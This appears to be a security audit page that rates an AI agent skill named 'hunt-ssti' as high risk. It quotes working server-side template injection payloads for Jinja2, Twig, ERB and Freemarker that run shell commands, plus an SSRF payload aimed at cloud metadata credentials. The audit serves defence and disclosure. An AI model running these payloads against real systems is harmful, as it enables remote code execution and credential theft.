Skills
skills/elementalsouls/claude-bughunter/hunt-ssti/Gen Agent Trust Hub

hunt-ssti

Fail

Audited by Gen Agent Trust Hub on Jun 13, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides functional payloads for Remote Code Execution (RCE) targeting several template engines:
  • Jinja2 (Python/Flask): {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
  • Twig (PHP/Symfony): {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
  • ERB (Ruby): <%= \id` %>`
  • Freemarker: <#assign x="freemarker.template.utility.Execute"?new()>${x("id")}
  • [COMMAND_EXECUTION]: The provided payloads are explicitly designed to execute shell commands (e.g., id) on the host system where the template engine is running.
  • [DATA_EXFILTRATION]: The skill includes payloads for Server-Side Request Forgery (SSRF) specifically targeting internal cloud metadata services to exfiltrate credentials, such as: {{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }}.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jun 13, 2026, 04:05 PM
Security Audit — agent-trust-hub — hunt-ssti